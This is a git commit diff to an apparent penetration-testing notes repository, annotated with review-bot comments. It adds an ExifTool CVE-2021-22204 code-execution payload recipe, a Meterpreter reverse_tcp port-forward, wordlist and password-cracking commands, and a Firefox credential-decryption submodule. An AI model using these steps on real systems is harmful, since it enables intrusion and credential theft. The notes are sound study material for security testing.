added password stuff
This commit is contained in:
parent
c328c604dd
commit
469aeb2618
|
@ -70,3 +70,6 @@
|
||||||
[submodule "exploit/web/content_security_policy/JSONBee"]
|
[submodule "exploit/web/content_security_policy/JSONBee"]
|
||||||
path = exploit/web/content_security_policy/JSONBee
|
path = exploit/web/content_security_policy/JSONBee
|
||||||
url = https://github.com/zigoo0/JSONBee.git
|
url = https://github.com/zigoo0/JSONBee.git
|
||||||
|
[submodule "post_exploitation/firefox_decrypt"]
|
||||||
|
path = post_exploitation/firefox_decrypt
|
||||||
|
url = https://github.com/unode/firefox_decrypt.git
|
||||||
|
|
|
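Review bot: the new `post_exploitation/firefox_decrypt` submodule arrives without a README next to it, unlike the other tools this commit adds (Wfuzz, pspy), so nothing records what it is for or how it is invoked; add a short README in the same style as the others, and since the tool recovers stored browser credentials, say which profile directory it expects so the note is usable for verifying a host's exposure.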
@ -0,0 +1,6 @@
|
||||||
|
# Wfuzz
|
||||||
|
|
||||||
|
* Fuzz parameters
|
||||||
|
```sh
|
||||||
|
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/common.txt -X POST --hh 45 -u http://<target-IP>/api/items\?FUZZ\=test
|
||||||
|
```
|
|
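Review bot: `--hh 45` in the Wfuzz line is a magic number tied to one target's baseline response length; note that it hides responses of exactly that many characters and that the baseline has to be measured first with a run without the filter, otherwise a copied command silently hides the wrong responses. The backslash escapes in `/api/items\?FUZZ\=test` are only needed because the URL is unquoted; `-u 'http://<target-IP>/api/items?FUZZ=test'` is simpler and less error-prone.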
@ -0,0 +1,26 @@
|
||||||
|
# Meltdown
|
||||||
|
|
||||||
|
* [PoC from IAIK](https://github.com/IAIK/meltdown.git)
|
||||||
|
![Overview](https://gcdn.pbrd.co/images/IitOpaf.png?raw=true "Meltdown")
|
||||||
|
|
||||||
|
* Each page table entries has the following flag values
|
||||||
|
* SUP (user or kernel mode)
|
||||||
|
* READ
|
||||||
|
* WRITE
|
||||||
|
|
||||||
|
* Flags are checked by the MMU
|
||||||
|
|
||||||
|
* Pipelined steps of an instruction are the following
|
||||||
|
* Fetch
|
||||||
|
* Decode
|
||||||
|
* Execute
|
||||||
|
* Memory access
|
||||||
|
* Register write back
|
||||||
|
|
||||||
|
* A pipeline can execute one of each steps concurrently every clock cycle.
|
||||||
|
* The MMU may jump between instruction queued in the pipeline to make use of time while the current instruction stalls.
|
||||||
|
* __Speculative execution__ is the reordering of instructions to speed up execution inside the pipeline.
|
||||||
|
* If a condition is executed speculatively, kernel memory may be executed. No error is thrown, because the is no assurance if the condition will actually be executed in the end.
|
||||||
|
|
||||||
|
* [Kernel Page Table Isolation](http://www.brendangregg.com/blog/2018-02-09/kpti-kaiser-meltdown-performance.html) can be used to mitigate meltdown.
|
||||||
|
|
|
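Review bot: the bullet "The MMU may jump between instruction queued in the pipeline" attributes instruction reordering to the MMU, but the MMU only translates addresses and checks the page-table flags listed above; the reordering is done by the CPU's out-of-order execution engine, so say "the CPU" there. In the same way, "kernel memory may be executed" under speculative execution should read "kernel memory may be read", which is the access Meltdown abuses. Grammar: "Each page table entries has" to "Each page table entry has", "instruction queued" to "instructions queued", "the is no assurance" to "there is no assurance". The overview image is hot-linked from gcdn.pbrd.co; committing it next to the README keeps the page intact if that host drops it.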
@ -0,0 +1,12 @@
|
||||||
|
# CVE-2021-22204
|
||||||
|
|
||||||
|
* Craft an a payload and execute it via exiftool
|
||||||
|
* [Article](https://blog.convisoappsec.com/en/a-case-study-on-cve-2021-22204-exiftool-rce/)
|
||||||
|
|
||||||
|
## Usage
|
||||||
|
* Payload is `(metadata "\c${system('id')};")`
|
||||||
|
```sh
|
||||||
|
sudo apt install djvulibre-bin
|
||||||
|
bzz payload payload.bzz
|
||||||
|
djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=payload.bzz
|
||||||
|
```
|
|
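Review bot: the usage block runs `bzz payload payload.bzz`, but nothing in the hunk creates the `payload` file; add the step that writes the `(metadata "\c${system('id')};")` line into it before `bzz`, otherwise the sequence fails at the second command. Fix "Craft an a payload" to "Craft a payload", and a line naming the ExifTool version that fixes the CVE (the linked article covers the fix) would make the README usable for checking that a host is patched, not only for reproducing the issue.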
@ -0,0 +1,8 @@
|
||||||
|
# Heartbleed
|
||||||
|
|
||||||
|
* SSL V1.0.1 and V1.0.1f
|
||||||
|
* Client sends msg, msglength
|
||||||
|
* If msg is 0 and the msglength is longer, return from server is arbitrary memory content
|
||||||
|
|
||||||
|
* [Heartbleed](https://heartbleed.com)
|
||||||
|
|
|
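Review bot: "SSL V1.0.1 and V1.0.1f" names the library vaguely and reads as two separate versions; the bug is in OpenSSL's heartbeat handling and the affected range runs from 1.0.1 through 1.0.1f, so write "OpenSSL 1.0.1 to 1.0.1f". The mechanism bullet is also imprecise: `msg` is the heartbeat payload and `msglength` the length the client claims for it, and the leak occurs because the server trusts the claimed length instead of the actual payload size and answers with that many bytes from its memory; phrase it as "claimed length larger than the real payload" rather than "msg is 0".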
@ -1 +1 @@
|
||||||
Subproject commit c765a2e0d0c25b883dcb92a6966c69b9880098da
|
Subproject commit eb411ea89b11df4485733201860619883a4f05e6
|
|
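Review bot: this hunk moves a submodule pointer from c765a2e0 to eb411ea8, but neither the hunk nor the commit message ("added password stuff") says which submodule it is or why it was bumped; name the submodule and the upstream change in the message so the bump can be reviewed independently of the password notes.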
@ -1 +0,0 @@
|
||||||
{"typ": "JWT", "alg": "HS256"}
|
|
|
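Review bot: the file holding `{"typ": "JWT", "alg": "HS256"}` is deleted without a replacement and the commit message does not mention it; if a README or script used it as the sample header for building test tokens, that reference is now dangling, so either keep the file or record the removal and its reason in the message.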
@ -123,6 +123,7 @@ document.onkeypress = function (e) {
|
||||||
```
|
```
|
||||||
## Tricks and Tips
|
## Tricks and Tips
|
||||||
* Use Polyglots
|
* Use Polyglots
|
||||||
|
* [XSS Filter Evasion Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html)
|
||||||
|
|
||||||
## Protection Methods
|
## Protection Methods
|
||||||
|
|
||||||
|
@ -133,3 +134,5 @@ There are many ways to prevent XSS, here are the 3 ways to keep cross-site scrip
|
||||||
2. Validating Input - This is the process of ensuring your application is rendering the correct data and preventing malicious data from doing harm to your site, database and users. Input validation is disallowing certain characters from being submit in the first place.
|
2. Validating Input - This is the process of ensuring your application is rendering the correct data and preventing malicious data from doing harm to your site, database and users. Input validation is disallowing certain characters from being submit in the first place.
|
||||||
|
|
||||||
3. Sanitising - Lastly, sanitizing data is a strong defence but should not be used to battle XSS attacks alone. Sanitizing user input is especially helpful on sites that allow HTML markup, changing the unacceptable user input into an acceptable format. For example you could sanitise the < character into the HTML entity <
|
3. Sanitising - Lastly, sanitizing data is a strong defence but should not be used to battle XSS attacks alone. Sanitizing user input is especially helpful on sites that allow HTML markup, changing the unacceptable user input into an acceptable format. For example you could sanitise the < character into the HTML entity <
|
||||||
|
|
||||||
|
|
||||||
|
|
|
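Review bot: in context item 3, "sanitise the < character into the HTML entity <" shows the same character twice because the entity `&lt;` was rendered by Markdown; put it in backticks (`&lt;`) so the example survives rendering. Also "being submit" should read "being submitted", and "sanitise"/"sanitizing" mix spellings within one item. The hunk only adds two blank lines here, so it is a cheap moment to fix those context lines as well.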
@ -1,10 +1,34 @@
|
||||||
# Generate Wordlists
|
# Generate Wordlists
|
||||||
|
|
||||||
|
* [username_generator](https://github.com/therodri2/username_generator.git)
|
||||||
* [CeWL](../enumeration/CeWL/README.md)
|
* [CeWL](../enumeration/CeWL/README.md)
|
||||||
* [Mentalist](https://github.com/sc0tfree/mentalist.git)
|
* [Mentalist](https://github.com/sc0tfree/mentalist.git)
|
||||||
* [lyricpass](https://github.com/initstring/lyricpass.git)
|
* [lyricpass](https://github.com/initstring/lyricpass.git)
|
||||||
* [pnwgen phonenumbers](https://github.com/toxydose/pnwgen.git)
|
* [pnwgen phonenumbers](https://github.com/toxydose/pnwgen.git)
|
||||||
|
|
||||||
|
|
||||||
|
## Cupp
|
||||||
|
|
||||||
|
* [cupp](https://github.com/Mebus/cupp.git)
|
||||||
|
* Interactive dialogue via `cupp.py -i`
|
||||||
|
* Wordlistdownload via `cupp.py -l`
|
||||||
|
* Connections to alecto DB via `-a`
|
||||||
|
|
||||||
|
## crunch
|
||||||
|
|
||||||
|
```sh
|
||||||
|
crunch <minlen> <maxlen> <charPool> -o <output.file>
|
||||||
|
```
|
||||||
|
|
||||||
|
* Option `-t` specifies variable characters
|
||||||
|
* `@`, lower case alpha characters
|
||||||
|
* `,`, upper case alpha characters
|
||||||
|
* `%`, numeric characters
|
||||||
|
* `^`, special characters including space
|
||||||
|
```sh
|
||||||
|
crunch 8 8 -t passw%%rd
|
||||||
|
```
|
||||||
|
|
||||||
## ttpassgen
|
## ttpassgen
|
||||||
* [ttpassgen](https://github.com/tp7309/TTPassGen.git)
|
* [ttpassgen](https://github.com/tp7309/TTPassGen.git)
|
||||||
* Generate lists from the ground up
|
* Generate lists from the ground up
|
||||||
|
|
|
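Review bot: `crunch 8 8 -t passw%%rd` will not run as written: the pattern `passw%%rd` is nine characters long while min and max are both 8, and crunch refuses a `-t` pattern whose length differs from the requested length; use `crunch 9 9 -t passw%%rd`. Under Cupp, "Wordlistdownload" should be "Wordlist download", and the `-a` bullet deserves the same `cupp.py -a` form as the other two options.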
@ -31,3 +31,7 @@ $[0-9]$[0-9]
|
||||||
### Existing Rules
|
### Existing Rules
|
||||||
* `l33t`, l33tsp34k
|
* `l33t`, l33tsp34k
|
||||||
* `NT`, case mutation
|
* `NT`, case mutation
|
||||||
|
* Example for `best64`
|
||||||
|
```sh
|
||||||
|
john --wordlist=single_password.txt --rules=best64 --stdout > out.txt
|
||||||
|
```
|
||||||
|
|
|
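Review bot: the `best64` example is added under "Existing Rules" but `best64` itself is not listed with the other rule names (`l33t`, `NT`); add it as a bullet with one line on what it does so the list and the example agree. It is also worth noting next to the command that `--stdout` only prints the mutated candidates and does no cracking, which is what makes it safe for building `out.txt`.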
@ -0,0 +1,9 @@
|
||||||
|
# Initial Passwords
|
||||||
|
|
||||||
|
* Services and products sometimes have credentials set initially.
|
||||||
|
|
||||||
|
* [default-password](https://default-password.info)
|
||||||
|
* [datarecovery](https://datarecovery.com/rd/default-passwords/)
|
||||||
|
|
||||||
|
|
||||||
|
|
|
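Review bot: "Services and products sometimes have credentials set initially" reads vaguely; "ship with default credentials" says the same thing plainly. A line stating the defensive takeaway (change or disable default accounts before a service is exposed, and include them in audit checklists) would make the page more than a link list.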
@ -56,3 +56,14 @@ Authorized audit of security systems of computers and networks.
|
||||||
* [OSSTMM3](https://www.isecom.org/OSSTMM.3.pdf)
|
* [OSSTMM3](https://www.isecom.org/OSSTMM.3.pdf)
|
||||||
* [NIST](https://www.nist.gov/cyberframework)
|
* [NIST](https://www.nist.gov/cyberframework)
|
||||||
* [CAF](https://www.ncsc.gov.uk/collection/caf/caf-principles-and-guidance)
|
* [CAF](https://www.ncsc.gov.uk/collection/caf/caf-principles-and-guidance)
|
||||||
|
|
||||||
|
## Testing Webapps
|
||||||
|
|
||||||
|
* Two methods
|
||||||
|
1. Every Page and its functions one by one
|
||||||
|
2. Test by stages
|
||||||
|
* Authorization
|
||||||
|
* Authentication
|
||||||
|
* Injection
|
||||||
|
* Client Side Controls
|
||||||
|
* Application Logic
|
||||||
|
|
|
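Review bot: the stage list under "2. Test by stages" puts Authorization before Authentication; since authorization testing presupposes working accounts and sessions, listing Authentication first reads more naturally. Also "Every Page" should be "every page", and the mixed numbered/bulleted nesting should be indented so Markdown renders the stages as children of item 2.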
@ -144,3 +144,8 @@ sshuttle -r <user>@<target> --ssh-cmd "ssh -i <key>" <subnet/CIDR>
|
||||||
```
|
```
|
||||||
* Exclude servers via `-x`, for example the target/gateway server
|
* Exclude servers via `-x`, for example the target/gateway server
|
||||||
|
|
||||||
|
### Meterpreter
|
||||||
|
* Meterpreter with payload `set payload linux/x64/meterpreter_reverse_tcp` and
|
||||||
|
```sh
|
||||||
|
portfwd add -l 22 -p 22 -r 127.0.0.1
|
||||||
|
```
|
||||||
|
|
|
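Review bot: the sentence "Meterpreter with payload `set payload linux/x64/meterpreter_reverse_tcp` and" is cut off before saying what the following command does; finish it, e.g. "and forward the target's local SSH port to the attacker host:". Also `-l 22` binds port 22 on the Metasploit host, which needs root and collides with a running sshd; a high local port such as `-l 2222` avoids both problems.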
@ -0,0 +1 @@
|
||||||
|
Subproject commit b71a030ae8c2c5253716243a1a9375bd36074be8
|
|
@ -0,0 +1,5 @@
|
||||||
|
# pspy
|
||||||
|
|
||||||
|
* Snoop processes withou root permissions
|
||||||
|
* [Repo](https://github.com/DominicBreuker/pspy.git)
|
||||||
|
|
|
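Review bot: "withou" should be "without" in the first bullet. Since the README is only two lines, add one sentence on what the tool is meant to surface (which scheduled or privileged processes it helps an auditor see) so the entry is self-explanatory.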
@ -0,0 +1,15 @@
|
||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
def xor(data, key):
|
||||||
|
keylen = len(key)
|
||||||
|
return bytearray((
|
||||||
|
(data[i] ^ key[i % keylen]) for i in range(0,len(data))
|
||||||
|
))
|
||||||
|
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
data = bytearray(open('topsecret.txt', 'rb').read())
|
||||||
|
key = b'key'
|
||||||
|
res = xor(data, key)
|
||||||
|
print(res.decode())
|
||||||
|
|
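Review bot: `print(res.decode())` on the last line raises UnicodeDecodeError whenever the XORed bytes are not valid UTF-8, which is the normal case when the script is used to encrypt rather than decrypt; write the raw bytes instead (`sys.stdout.buffer.write(res)`) or to an output file. The `#!/usr/bin/env python` shebang may resolve to Python 2, where indexing `b'key'` yields one-character strings and `data[i] ^ key[i % keylen]` fails with a TypeError; use `#!/usr/bin/env python3`. Minor: open the file with `with open(...) as f:` so it is closed, `range(0, len(data))` is just `range(len(data))`, and the hard-coded `topsecret.txt` and `b'key'` would be better taken from the command line.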